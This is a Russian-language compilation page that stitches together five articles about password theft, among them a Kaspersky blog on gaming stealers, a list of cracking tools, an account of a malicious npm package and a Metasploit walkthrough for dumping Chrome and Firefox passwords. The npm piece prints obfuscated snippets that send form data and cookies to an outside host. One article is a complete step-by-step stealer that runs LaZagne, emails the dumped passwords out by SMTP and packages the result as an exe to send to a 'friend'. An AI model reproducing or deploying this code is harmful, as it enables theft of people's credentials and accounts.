Скрипт для кражи паролей

Как трояны воруют аккаунты в игровых сервисах

Скрипт для кражи паролей

Мы часто рассказываем, какое количество угроз в онлайне существует для геймеров: и в пиратках трояны прячутся, и в модах, и в читах. И это не говоря уже про фишинг и многочисленные способы обмана при покупке или обмене внутриигровых предметов. Про беды с покупкой аккаунтов мы тоже недавно рассказывали. К счастью, все эти проблемы не так страшны, если вы о них знаете.

Но есть еще одна опасность, о которой нужно, во-первых, знать, а во-вторых, уметь от нее защищаться. И имя ей — стилеры (Password Stealer, наши защитные решения их детектируют обычно как Trojan-PSW.что-нибудь). Это такие специальные трояны, которые заточены под воровство аккаунтов — или в виде логинов с паролями, или в виде токенов сессии.

Мы уже писали про Steam-стилеры — трояны, которые воруют аккаунты в самом популярном игровом сервисе. Но подобных игровых сервисов много — Battle.net, Origin, Uplay, Epic Games Store и так далее. У них всех многомиллионные аудитории, вокруг всех крутятся немаленькие деньги, и злоумышленники, естественно, ими интересуются. Поэтому стилеры существуют и для этих магазинов.

Что такое Password Stealer и какие они бывают

Password Stealer — это зловред, который ворует данные учетных записей. В сущности, стилер очень похож на банковский троян, только вместо того чтобы перехватывать или подменять введенные данные, он ворует уже сохраненную на компьютере информацию.

Например, логины и пароли, записанные в браузере, файлы cookies и просто какие-то файлы с жесткого диска зараженного устройства.

Более того, бывает так, что воровать игровые аккаунты — просто одна из функций стилера, а пароль от онлайн-банка его интересует ничуть не меньше.

Работают стилеры по-разному. Например, есть злобный троян-стилер Kpot (также известный как Trojan-PSW.Win32.Kpot). Он распространяется в основном через почтовый спам с вложениями, которые, используя уязвимости (например, в Microsoft Office), загружают на компьютер сам зловред.

Дальше стилер передает на командный сервер информацию об установленных на компьютере программах и в ответ получает список дальнейших действий. Среди них, например, возможность воровать cookie-файлы, аккаунты Telegram и Skype, а также много чего еще.

Помимо прочего, Kpot умеет воровать файлы с расширением .config из папки %APPDATA%\Battle.net, которая, как несложно догадаться, имеет отношение к сервису Battle.net — фирменному лончеру для игр Blizzard.

В этих файлах содержится токен сессии игрока.

То есть собственно логин и пароль в руки злоумышленника не попадают, но с помощью токена он сможет некоторое время притворяться пользователем, у которого он этот токен украл.

Зачем это надо мошенникам? Очень просто: все ценные внутриигровые предметы они быстренько перепродадут, выручив с этого неплохие деньги. Такие предметы — и возможность их перепродать — есть, например, в World of Warcraft и в Diablo III.

Или, скажем, есть зловред, который целится в другой сервис — Uplay, фирменный лончер для игр Ubisoft. Этого зловреда зовут Okasidis, наши решения ловят его под общим вердиктом Trojan-Banker.MSIL.Evital.gen.

В отношении воровства игровых аккаунтов он ведет себя точно так же, как троян Kpot, разве что ворует два конкретных файла — %LOCALAPPDATA%\Ubisoft Game Launcher\users.

dat и %LOCALAPPDATA%\Ubisoft Game Launcher\settings.yml.

Тот же Uplay интересует и зловреда по имени Thief Stealer (детектируется под общим вердиктом — как HEUR:Trojan.Win32.Generic). Разве что этот, не стесняясь, тащит вообще все файлы из папки %LOCALAPPDATA%\Ubisoft Game Launcher\.

Также Uplay, Origin и Battle.net интересуют зловреда BetaBot (детектируется как Trojan.Win32.Neurevt).

Но этот троян работает иначе: если пользователь посещает URL, содержащий определенные ключевые слова (например, любые адреса, в которых есть слова uplay или origin), зловред включает сбор данных из форм на этих страницах. Таким образом, введенные на таком сайте логин и пароль от аккаунта попадут злоумышленникам.

Во всех трех случаях пользователь, скорее всего, ничего не заметит — троян никак не выдает себя на компьютере, не выводит окон с требованиями, а просто тихонько ворует файлы или данные.

Как защититься от троянов, ворующих аккаунты в игровых сервисах

В принципе защищать аккаунты в игровых сервисах нужно так же, как и все остальное. В том числе и от стилеров. Следуйте советам ниже — и никакие троянские воры будут вам не страшны:

  • Защитите аккаунт при помощи двухфакторной аутентификации. У Steam есть Steam Guard, у Battle.net — Blizzard Authenticator, Epic Games Store предлагает выбор между аутентификацией через приложение-аутентификатор, SMS или почту. Если ваш аккаунт защищен таким способом, то украденных логина и пароля будет недостаточно для входа в него.
  • Не скачивайте моды с сомнительных сайтов и пиратки. Злоумышленники знают тягу людей к бесплатному и пользуются ей, поэтому в кряках, читах и модах нередко можно встретить зловредов.
  • Пользуйтесь надежным защитным решением. Например, Kaspersky Security Cloud всех этих стилеров ловит и не дает им воровать данные.
  • Не выключайте антивирус во время игры. Иначе получится так, что антивирус вы выключили, собрались залогиниться в сервис — и тут-то дремавший прежде стилер и украдет пароли. В том же Kaspersky Security Cloud есть специальный игровой режим, который не позволяет антивирусу сильно загружать машину во время игры. Поэтому на производительность и частоту кадров он не повлияет, а вот за безопасностью приглядит.

Источник: https://www.kaspersky.ru/blog/gaming-password-stealers/28605/

Лучшие программы для взлома паролей

Скрипт для кражи паролей

Недавно мы опубликовали статью о надежности паролей, а также паролях, которые используются многими пользователями. Большинство людей используют слабые пароли. Но как убедится, что ваш пароль сильный? Взлом паролей – это неотъемлемая часть цифровой криминалистики и тестирования информационной безопасности.

В этой статье мы собрали лучшие программы для взлома паролей, которые могут использоваться системными администраторами для проверки надежности их паролей. Все утилиты используют различные алгоритмы и применимы к различным ситуациям. Рассмотрим сначала базовую информацию, которая поможет вам понять с чем мы будем иметь дело.

Что такое взлом паролей?

В области кибербезопасности и криптографии взлом паролей играет очень важную роль. Это процесс восстановления пароля с целью нарушения или восстановления безопасности компьютера или системы.

Итак, почему вам нужно узнать программы перебора паролей? В мирных целях можно использовать взлом паролей для восстановления забытых паролей от онлайн аккаунтов, также это используется системными администраторами для профилактики на регулярной основе.

Для взлома паролей в большинстве случаев используется перебор. Программное обеспечение генерирует различные варианты паролей и сообщает если был найден правильный. В некоторых случаях персональный компьютер способен выдавать миллионы вариантов в секунду. Программа для взлома пароля на пк проверяет все варианты и находит реальный пароль.

Время, необходимое для взлома пароля пропорционально длине и сложности этого пароля. Поэтому рекомендуется использовать сложные пароли, которые трудно угадать или подобрать. Также скорость перебора зависит от криптографической функции, которая применяется для генерации хэшей пароля. Поэтому для шифрования пароля лучше использовать Bcrypt, а не MD5 или SHA.

Вот основные способы перебора пароля, которые используются злоумышленниками:

  • Атака по словарю – для атаки используется файл, который содержит список слов. Программа проверяет каждое из слов, чтобы найти результат;
  • Атака Bruteforce – можно не использовать словарь, а перебирать все комбинации заданных символов;
  • Атака с помощью радужных таблиц – в атаке используются предварительно вычисленные хэши, поэтому она быстрее.

Есть и другие методы взлома паролей, основанные на социальной инженерии, но сегодня мы остановимся только на атаках без участия пользователя.

Чтобы защититься от таких атак нужно использовать только сложные пароли. А теперь рассмотрим лучшие инструменты для взлома паролей 2017.

Этот список опубликован только для ознакомительных целей и мы ни в коем случае не призываем взламывать чужие личные данные.

1. John the Ripper

John the Ripper – это один из самых популярный инструментов для перебора паролей, доступных абсолютно всем. Он распространяется с открытым исходным кодом и написан на языке программирования Си. Здесь собраны различные методы перебора паролей.

Программа способна перебирать пароли по сохраненному хэшу, и поддерживает различные алгоритмы хэширования, в том числе есть автоматическое определение алгоритма. John the Ripper относиться к набору инструментов для тестирования безопасности от Rapid7. Кроме Linux поддерживается Windows и MacOS.

2. Aircrack-ng

Aircrack-ng – это набор программ для взлома и перехвата паролей от wifi сетей. Программа – одна из лучших, которые используются хакерами. Здесь есть все необходимое для взлома WEP и WPA шифрования, начиная от перехвата хэша, и до получения готового пароля.

Особенно легко поддается взлому шифрование WEP, для преодоления защиты существуют атаки PMS и PTW, с помощью которых можно взломать этот протокол в считаные минуты при достаточном потоке трафика через сеть. Поэтому всегда используйте WPA2 чтобы быть в безопасности. Тоже поддерживаются все три платформы: Linux, Windows, MacOS.

3. RainbowCrack

Как следует из названия, RainbowCrack использует радужные таблицы для взлома хэшей паролей. С помощью уже готовых таблиц утилита очень сильно уменьшает время взлома. Кроме того, есть как графический интерфейс, так и утилиты командной строки.

После завершения этапа предварительных вычислений этот инструмент работает в сотни раз быстрее чем при обычном переборе. Вам не нужно самим создавать таблицы, разработчики уже создали их для LM, NTLM, MD5 и SHA1. Все доступно бесплатно.

Еще один важный момент – это ускорение с помощью GPU. С помощью использования видеокарты вы можете снизить время вычисление пароля еще на несколько порядков. Поддерживаются платформы Windows и Linux.

4. THC Hydra

В отличие от выше перечисленных программ, Hydra работает по-другому. Она не вычисляет хэши. Вместо этого, программа выполняет атаки перебора на различные сетевые протоколы. Здесь поддерживаются Astrisk, FTP, HTTP, MySQL, XMPP, Telnet, SHH и многие другие. Основная цель утилиты – атаки перебора на форму ввода пароля.

Этот инструмент помогает исследователям безопасности узнать насколько легко можно получить доступ к удаленной системе. Для расширения функций можно добавлять модули, поддерживается Linux, Windows, Solaris, FreeBSD и MacOS.

5. HashCat

По заявлениям разработчиков – это самый быстрый инструмент для перебора паролей. Он распространяется в качестве свободного программного обеспечения и поддерживает такие алгоритмы: md4, md5, LM, SHA, MySQL, Cisco PIX и Unix Crypt.

Есть версии инструмента для перебора на CPU, а также взлома на основе GPU – oclHashcat и cudaHashcat. Кроме стандартной атаки Bruteforce, поддерживаются атаки по словарю, гибридные атаки по самые, по таблицам, Prince и так далее. Из платформ поддерживаются Windows, Linux и MacOS.

6. Crowbar

Crowbar – это популярный инструмент для тестирования безопасности паролей. Другие программы перебора паролей используют логины и пароли пользователей, но crowbar позволяет перебирать ключи SSH.

Этот инструмент с открытым исходным кодом создан для работы с протоколами, которые редко поддерживаются другими программами. Сейчас поддерживается VNC, OpenVPN, SSP, NLA. Программа может работать на Linux, Windows и MacOS.

7. coWPAtty

Это реализация утилиты для перебора пароля от WPA/WPA2 PSK на основе словаря или радужных таблиц. Использование радужных таблиц очень сильно ускоряет работу утилиты. Стандарт PSK используется сейчас очень часто. Радует только то, что перебрать пароль очень сложно, если он был изначально выбран правильным.

Выводы

В этой статье мы рассмотрели лучше программы для взлома паролей 2017, которые могут использоваться как злоумышленниками, так и системными администраторами для проверки надежности паролей пользователей. Обязательно устанавливайте сложные пароли для своих устройств и аккаунтов, а также если вы системный администратор, следите за  безопасностью паролей пользователей вашей компании.

(17 4,82 из 5)
Загрузка…

Источник: https://losst.ru/luchshie-programmy-dlya-vzloma-parolej

Кража паролей: как наши учетные записи уводят через npm-пакет

Скрипт для кражи паролей

Кража паролей лишит вас доступа к своей странице или может оставить без кругленькой суммы – вот оно, счастье злоумышленника.

Рассмотрим один интересный способ, как кража паролей может быть успешно реализована

Заполучить пароль или номер кредитной карты можно многими способами. Далее речь пойдет о том, как это делается при помощи внедрения кода в npm-пакет.

Вредоносный код, который и выполняет всю грязную работу, занимается поиском на странице браузера чего-либо из представленного ниже:

  • любая форма для ввода;
  • элемент со свойством, в названии которого встречается «password», «cardnumber», «cvc», «checkout» и т. д.

Если после события submit искомая информация найдена, на этой страничке есть чем поживиться.

  • Из каждого поля формы извлекаем информацию: ( document.forms.forEach(…) );
  • собираем “печеньки”: document.cookie;
  • все это дело оборачивается всегда в рандомную строку: const payload = btoa(JSON.stringify(sensitiveUserData));
  • а после, отправляется на промежуточный хост: https://legit-analytics.com?q=${payload};
  • и в случае наличия полезностей – отправляется на сервер хакера.

Перевернем мир

Чтобы это счастье вышло в свет, нужно как-то заставить код попасть на потенциальные сайты-доноры. Можно пытаться пробиться через расширения браузеров, но это не так эффективно. Межсайтовый скриптинг – хороший вариант, но у него (у XSS) есть свои протоколы безопасности, и снова не те масштабы. Гораздо лучше подойдет npm.

Можно изобрести пакет, который будет на лету менять цвет консольного вывода в браузере.

Заставляем принять этот “полезный” апдейт в свои зависимости, при помощи пулл-реквеста для нескольких (любых) существующих пакетов в сети, и ждать.

Через месяц имеем 120000 скачиваний этого обновления и выполнение кода на более чем 1000 сайтов. Конечно же, это не панацея, и велика вероятность, что эфемерное обновление пакета не примут с распростертыми объятиями, но это безопасно, и есть шанс, что быстро не засекут.

А может, ложку дегтя?

Звучит все гладко и красиво, но есть некоторые вопросы, которые могут появиться у пытливого читателя, и их нужно развенчать.

Сетевые запросы от скрипта – код почти ничего не отправляет, т. е. постоянного обмена трафиком нет.

Отсылка собранного материала происходит с 19:00 до 7:00, когда безопасники и прочие тестеры уже ничего не тестируют.

Даже если тестировщик и захочет отличиться, код подменяет URL на “левый”, схожий с социальными сетями, и отправка происходит всегда в разное время: вот такой эффект неожиданности.

Поиск “странностей” в npm. Удачи! Временные и ресурсные затраты несопоставимы, ну а если и найдется что-то, то в коде нет и намека на fetch, XMLHttpRequest или адрес хоста, на который все отправляется.

const i = 'gfudi'; const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() – 1)).join(''); self[k(i)](urlWithYourPreciousData);

“gfudi” – это fetch, но с переставленными буквами на одну, а self – это алиас window. Не используется ничего обычного, как fetch. Вместо этого, везде где можно, нужно применять EventSource(urlВашихЛюбимыхДанных). Даже если трафик буду слушать по serviceWorker-у, никто ничего не заподозрит т. к. ничего не отправляется в браузерах, которые поддерживают serviceWorker.

Использование CSP в качестве защиты. С точки зрения CSP наш код ничего запрещенного не делает, кроме отправки данных на какой-то домен. Да, CSP неплохо справляется с XSS-атаками и может ограничивать общение браузера с внешним миром, но действия скрипта не настолько масштабны, чтобы можно было что-то проанализировать.

const linkEl = document.createElement('link'); linkEl.rel = 'prefetch'; linkEl.href = urlWithYourPreciousData; document.head.appendChild(linkEl);

Чтобы не поплатиться за взлом, нужно проверять CSP на наличие функционирующей системы блокировки (connect-src) и инструмент-перехватчик (default-src). Сделать это можно так:

fetch(document.location.href) .then(resp => { const csp = resp.headers.get('Content-Security-Policy'); // Смотрим, как работает CSP });

Проверять нужно в первый раз, чтобы пользователь, и прочие надзиратели ничего не заподозрили.

Куда теперь бежать?

Теперь подумаем от лица пользователя или разработчика: “Все плохо, наши пароли уже в даркнэте!”. Чтобы попытаться избежать провала, нельзя использовать npm на страницах с формами, и прочими собирающими компонентами.

Нельзя использовать стороннюю рекламу, Google Tag Manager, скрипты с диаграммами, аналитику – никакого постороннего кода быть не должно, иначе можно получить инъекцию.

Это касается только страниц, где пользователь что-то вводит, остальная же часть сайта может спокойно работать на React-е и не беспокоиться.

Вам нужна отдельная страница, которая не имеет ничего лишнего и уже в ней собирать номера кредиток, пароли и учетные данные в iFrame.

Кража паролей осуществляется и при помощи фишинга (подделывание настоящего сайта инфицированной копией). Если хакер сможет завладеть вашим почтовым ящиком, то плакали все регистрации и банковские счета, которые были привязаны к этой почте. За 2017 год было взломано 12 млн. учетных записей.

Вполне успешным является и кейлогерство – 1 млн. пользователей пострадал, именно из-за этого вредоноса.

Заключение

Статья о том, что никому нельзя доверять, и оставлять сайт с известными уязвимостями строго запрещено, т. к. в мире огромное количество желающих полакомиться чем-то ценным. Любой сайт уязвим, и список этих брешей постоянно меняется: не забывайте держать руку на пульсе.

Перевод на русский осуществлен Библиотекой Программиста.

Оригинал статьи

Другие материалы по теме:

Источник: https://proglib.io/p/steal-password/

Пример трояна для кражи паролей с компьютера

Скрипт для кражи паролей

Здравствуй, читатель сегодня поговорим о том почему не надо открывать непроверенные файлы скачанные с неизвестных источников и создадим такой файл чтобы понять что он может наделать на вашем ПК. Создавать мы будем стиллер который соберет все наши пароли и отправит их нам по почте.

Что для этого нужно?

Нам понадобится:

  1. Python 3.x.x
  2. Инструмент для восстановления паролей(в нашем случае LaZagne)
  3. Два аккаунта Google

И так начинаем

Для начала поместим .exe файл инструмента LaZagne в папку с нашим проектом. Далее создадим .bat файл с любым названием(у меня будет main.bat) и файл send.py.

У нас должна получится такая структура:

Project:

  • laZagne.exe
  • send.py
  • main.bat

Пишем код

Откроем файл main.bat и поместим туда код:

@Echo off laZagne.exe all > pass.txt

Теперь при запуске нашего .bat файла у нас появится файл pass.txt в котором будут все ваши пароли из браузеров(и не только). Осталось только отправить данные на почту. Но как это сделать?

Отправка на почту

Открываем файл send.py и вставляем код:

import smtplib import os import mimetypes from email import encoders from email.mime.base import MIMEBase from email.mime.text import MIMEText from email.mime.image import MIMEImage from email.mime.audio import MIMEAudio from email.mime.multipart import MIMEMultipart def send_email(addr_from, password, addr_to, files): msg_subj = 'Password' msg_text = 'Password' msg = MIMEMultipart() msg['From'] = addr_from msg['To'] = addr_to msg['Subject'] = msg_subj body = msg_text msg.attach(MIMEText(body, 'plain')) process_attachement(msg, files) #==========Код зависящий от сервиса========== server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit() #============================================ def process_attachement(msg, files): for f in files: if os.path.isfile(f): attach_file(msg,f) elif os.path.exists(f): dir = os.listdir(f) for file in dir: attach_file(msg,f+”/”+file) def attach_file(msg, filepath): filename = os.path.basename(filepath) ctype, encoding = mimetypes.guess_type(filepath) if ctype is None or encoding is not None: ctype = 'application/octet-stream' maintype, subtype = ctype.split('/', 1) if maintype == 'text': with open(filepath) as fp: file = MIMEText(fp.read(), _subtype=subtype) fp.close() elif maintype == 'image': with open(filepath, 'rb') as fp: file = MIMEImage(fp.read(), _subtype=subtype) fp.close() elif maintype == 'audio': with open(filepath, 'rb') as fp: file = MIMEAudio(fp.read(), _subtype=subtype) fp.close() else: with open(filepath, 'rb') as fp: file = MIMEBase(maintype, subtype) file.set_payload(fp.read()) fp.close() encoders.encode_base64(file) file.add_header('Content-Disposition', 'attachment', filename=filename) msg.attach(file) #=====Настройки================================= _from = “from@gmail.com” _password = “password” _to = “to@gmail.com” files = [“pass.txt”] #============================================= send_email(_from, _password, _to, files)

Теперь нужно настроить и в зависимости от сервиса по которому будете отправлять почту изменяем выделенный код: Google (прежде нужно разрешить доступ для менее безопасных приложений):

server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit()

Mail.ru:

server = smtplib.SMTP_SSL('smtp.mail.ru', 25) server.login(addr_from, password) server.send_message(msg) server.quit()

Yandex:

server = smtplib.SMTP_SSL('smtp.yandex.ru', 465) server.login(addr_from, password) server.send_message(msg) server.quit()

Доделываем .bat

Теперь в наш .bat файл добавим код запуска файла send.py и удаления файла pass.txt:

send.py del /s “pass.txt”

Сборка

Теперь после запуска main.bat ваши пароли будут отправлены к вам на почту но если у вас не установлен Python то ничего не получится нужно превратить наш send.py файл в exe. Для этого открываем консоль и пишем:

pip install pyinstaller pyinstaller –onefile send.py

Еще но нужно превратить main.bat файл в main.exe, и в этом нам поможет Bat To Exe Converter. Жмем на кнопку с тремя точками(«…») и ищем ваш файл main.bat, жмем «Открыть», после чего жмем «Convert» и получаем файл main.exe. Эти три файла и есть наш стиллер, можем отправлять другу и радоватьсяпроверять на работоспособность.

Ссылки

  • Google
  • LaZagne
  • Bat To Exe Online Converter
[Total: 8 Average: 4.3]

Источник: https://cryptoworld.su/primer-troyana-dlya-krazhi-parolej-s-kompyutera/

Как удаленно украсть и дешифровать пароли Chrome и Firefox

Скрипт для кражи паролей

Пароли, хранящиеся в веб-браузерах, таких как Google Chrome и Mozilla Firefox — это просто золотая жила для хакеров.

Злоумышленник, у которого есть бэкдор-доступ к взломанному компьютеру может легко сделать дамп паролей, а затем расшифровать все данные, хранящиеся в веб-браузерах.

После прочтения этой статьи вы дважды подумаете, прежде чем кликнуть на «Сохранить», когда вам предложат сохранить новый пароль.

С помощью бэкдора, установленного на целевом компьютере, хакеры могут осуществлять различные скрытые атаки. Они могут перехватывать любое нажатие вами клавиш, делать скриншоты экрана, записывать звук через микрофон. В этой статье мы сосредоточимся на том, как хакеры могут получить ваши пароли, которые хранятся в веб-браузерах.

После того, как хакер установит свою полезную нагрузку и начнет эксплуатацию уязвимостей системы (в нашем случае это Windows 10), он сможет начать атаку, направленную на изъятие паролей из Google Chrome и Mozilla Firefox, которые оцениваются как лучшие и самые популярные веб-браузеры. Количество пользователей Microsoft Edge составляет около 4%, поэтому работа с этим браузером не стоит затраченного времени.

Создание дампа паролей Google Chrome

Для шифрования паролей, хранящихся на компьютерах, с рандомно сгенерированным ключом, Chrome использует функцию Windows, которая называется CryptProtectData.

Только пользователь с теми же учетными данными, что и у пользователя, который зашифровал эти данные, сможет впоследствии расшифровать эти пароли.

Каждый пароль зашифровывается другим случайным ключом и хранится в небольшой базе данных на компьютере. База данных находится вот в этой директории:

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

Далее мы будем использовать модуль Metasploit, предназначенный специально для дампа паролей, хранящихся в браузере Chrome. Чтобы сделать дамп сохраненных паролей Chrome на целевом устройстве, нужно воспользоваться модулем enum_chrome, введя в консоль команду ниже. Этот модуль начнет собирать пользовательские данные из Google Chrome, а затем пытаться их дешифровать.

run post/windows/gather/enum_chrome

Расшифрованные пароли Chrome будут автоматически сохранены в директории /root/.msf4/loot/. Имя .txt-файла, содержащего расшифрованные пароли, будет содержать в себе текущую дату и IP-адрес целевого компьютера.

Читать также:  Взлом IP-камер [root уязвимость]

Чтобы просмотреть пароли Chrome в файле .txt, сначала воспользуйтесь командой background для того, чтобы отправить meterpreter в фоновый режим, а затем используйте команду cat, как показано на скриншоте ниже. Обязательно поменяйте имя файла на то, которое есть у вас. В столбце «Decrypted Data» будут отображены дешифрованные пароли, найденные в браузере.

background cat /root/.msf4/loot/2018…_default_…_chrome.decrypted_xxxxx.txt

Создание дампа паролей Mozilla Firefox

Встроенный менеджер паролей Firefox хранит зашифрованные учетные данные в файле с именем «logins.json». Имена пользователей и пароли, хранящиеся в файле logins.json, зашифровываются ключом, который, в свою очередь, хранится в файле «key4.db».

Оба файла logins.json и key4.db могут находиться в директории Windows, указанной ниже.

8-символьный randomString автоматически присваивается директории Firefox, когда он впервые запускается на компьютере и эти случайные строки (randomString) отличаются для каждой установки.

%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

Чтобы сделать дамп сохраненных паролей Firefox на скомпрометированном компьютере, используйте модуль firefox_creds.

run post/multi/gather/firefox_creds

Точно также воспользуйтесь командой background, чтобы временно перевести сеанс meterpreter в фоновый режим, затем с помощью команды cd перейдите в директорию loot, куда сохраняются сохраненные файлы. При помощи команды mkdir создайте новую директорию с названием «Profiles».

Если посмотрите внимательно на сохраненные данные, то вы заметите, что все эти файлы автоматически сохраняются с расширением .bin.

Эти файлы необходимо вручную переместить и переименовать в соответствии с их оригинальными именами, выделенными в левой части скриншота. Например, файл «cert_501854.

bin» необходимо перенести в каталог Profiles и переименовать в «cert9.db». Команда mv поможет вам в этом деле.

mv certfilehere.bin Profiles/cert9.db

Это нужно сделать со всеми сохраненными в директории loot файлами.

Чтобы дешифровать пароли, хранящиеся в файле logins.json, клонируйте репозиторий firefox_decrypt с GitHub. Для этого воспользуйтесь следующей командой:

git clone https://github.com/Unode/firefox_decrypt.git

Команду, приведенную ниже, нужно использовать для дешифрования паролей Firefox, хранящихся в файле logins.json. Скрипт запросит «Мастер-пароль», но это можно обойти, если оставить поле пустым и нажать Enter.

python firefox_decrypt/firefox_decrypt.py /root/.msf4/loot/

Как защититься от кражи паролей хакерами

Хранение конфиденциальных данных в менеджере паролей браузеров — очень плохая идея. К сожалению, мы не так уж и много можем сделать для того, чтобы предотвратить такие атаки:

Читать также:  Анонимное общение

не сохранять учетные данные в вашем браузере
удалить те, которые там уже сохранены

Вы можете использовать менеджер паролей, такой как LastPass, но если хакер эксплуатировал вашу систему с бэкдором, то он также мог использовать клавиатурный сниффер (кейлоггер), чтобы получить ваш мастер-пароль, который — ключ ко всему. Даже если вы не храните ваши пароли на вашем компьютере, кейлоггер наверняка перехватит их, когда вы будете вводить их вручную на том сайте, который посещаете.

Простое воздержание от хранения большого количества данных в одном небезопасном месте может помочь уменьшить масштаб ущерба, причиняемого злоумышленником, но нет никакой возможности хранить ваши пароли по-настоящему в безопасности, пока вы не будете препятствовать хакерам устанавливать бэкдор на вашем компьютере.

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.

Источник: https://HelpuGroup.com/kak-udalenno-ukrast-i-deshifrovat-paroli-chrome-i-firefox/

Вопросы адвокату
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: